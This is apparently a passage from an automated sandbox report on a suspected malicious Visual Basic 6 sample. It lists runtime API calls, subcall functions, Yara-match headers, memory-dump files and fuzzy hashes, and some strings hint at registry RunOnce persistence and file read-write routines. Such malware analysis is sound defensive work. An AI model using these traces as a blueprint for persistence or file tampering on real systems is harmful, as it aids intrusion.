                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411323
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411326
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411339
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0041133D
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411355
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411364
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411370
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041137A
                                                                                                                                                            • #525.MSVBVM60(00001000), ref: 00411385
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411390
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411398
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 0041139B
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004113D2
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004113DB
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004113E3
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004113EC
                                                                                                                                                            • #598.MSVBVM60 ref: 00411404
                                                                                                                                                            • #525.MSVBVM60(-00000001), ref: 00411424
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041142F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411437
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00411440
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411448
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00411451
                                                                                                                                                            • #598.MSVBVM60 ref: 0041145E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004114A9
                                                                                                                                                              • Part of subcall function 0040EAB0: #594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0040EB1A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                              • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                              • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004114BD
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004114C5
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004114CE
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004114E2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004114ED
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 004114F0
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004114F9
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041150F
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00411518
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041151D
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00411520
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00411529
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00411572), ref: 00411560
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00411565
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041156A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041156F
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00411589
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 936154001-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040BF4E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040BF95
                                                                                                                                                              • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                              • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,?,80000002,?,Start,00000004,80000002,?,Start,00000002,80000001,?,?,00000000), ref: 0040C00B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C016
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,?,?,00000000,?,?,?,00000000,004025E6), ref: 0040C030
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C03B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                              • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                              • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,004025E6), ref: 0040C056
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,?,?,00000000,004025E6), ref: 0040C072
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C07D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,?,?,00000000,?,00000000,004025E6), ref: 0040C096
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C0A1
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,004025E6), ref: 0040C0BC
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040C0D3
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C0DE
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C111
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C12C
                                                                                                                                                            • __vbaNew.MSVBVM60(0040564C), ref: 0040C13E
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C149
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C17C
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C197
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040C1C2
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000000,00000001), ref: 0040C1D6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C1EB
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000001,00000000), ref: 0040C1F4
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C214
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040C238
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040C252
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040C259
                                                                                                                                                            • #529.MSVBVM60(00000008), ref: 0040C26D
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C27D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Error$CopyMove$System$AnsiListUnicode$Chkstk$CheckHresult$#529BstrCast
                                                                                                                                                            • String ID: RO$C$Once$Start
                                                                                                                                                            • API String ID: 3306888832-2962527757
                                                                                                                                                            • Opcode ID: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                            • Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
                                                                                                                                                            • Opcode Fuzzy Hash: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                            • Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040AE5E
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,?,004025E6), ref: 0040AEA7
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AEB6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AECE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AEF4
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040AF1D
                                                                                                                                                              • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                              • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,004025E6), ref: 0040AF5A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 0040AF94
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040AFAA
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 0040AFC3
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0040AFEC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040AFF7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040B02E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040B06D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040B088
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040B0AE
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0040B0BF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0040B0D4
                                                                                                                                                            • #616.MSVBVM60(?,?), ref: 0040B0E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040B0F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 0040B111
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 0040B118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040B123
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B139
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,004025E6), ref: 0040B14D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,?,?,?,004025E6), ref: 0040B17F
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,?,?,?,004025E6), ref: 0040B1BD
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B204
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,004025E6), ref: 0040B21A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B233
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 0040B257
                                                                                                                                                            • #580.MSVBVM60(?,00000027,?,?,0041B088,?), ref: 0040B2DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,?,?), ref: 0040B2F3
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 0040B312
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040B324
                                                                                                                                                            • #580.MSVBVM60(?,00000027,?,?,0041B088,?), ref: 0040B399
                                                                                                                                                            • __vbaStrCat.MSVBVM60( PR,?,?), ref: 0040B3B2
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 0040B3D1
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040B3E3
                                                                                                                                                              • Part of subcall function 00410560: __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                              • Part of subcall function 00410560: __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,?,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                            • #598.MSVBVM60 ref: 0040B3F0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040B456), ref: 0040B42E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Free$Ansi$Move$ChkstkUnicode$#580#600Copy$#517#525#598#616BoundsBstrConstruct2GenerateList
                                                                                                                                                            • String ID: PR$ SE$4
                                                                                                                                                            • API String ID: 3576955720-2816282373
                                                                                                                                                            • Opcode ID: 058ab15efcf3795bcaaf05ff51ece3fbc155b1467b198e57c7543b98bf17ede9
                                                                                                                                                            • Instruction ID: 549e129ae2bb91e84472ac49bce2616dd184e0a5e73778e746ab4582d66d714c
                                                                                                                                                            • Opcode Fuzzy Hash: 058ab15efcf3795bcaaf05ff51ece3fbc155b1467b198e57c7543b98bf17ede9
                                                                                                                                                            • Instruction Fuzzy Hash: D3F1FAB5901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF58
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(72A219DC,00000000,00000FEE), ref: 004191A8
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004191B0
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 004191B4
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 004191CC
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 004191DB
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,?,?), ref: 004191F4
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(004053B8), ref: 004191FF
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00419206
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00419217
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,?), ref: 0041922B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00419235
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00419245
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00419256
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00419259
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419277
                                                                                                                                                            • __vbaFileClose.MSVBVM60(?), ref: 0041928D
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,?), ref: 004192A6
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(004053B8), ref: 004192AD
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,0041B1A0,?), ref: 004192F5
                                                                                                                                                            • #525.MSVBVM60(?), ref: 004192FE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041930B
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,0041B1A4,?), ref: 0041931C
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,0041B110,?), ref: 0041932C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00419341
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00419359
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00419368
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,?), ref: 00419379
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00419384
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,?,00000000), ref: 00419396
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041939F
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004193C1
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 004193CC
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 004193F8
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 00419402
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
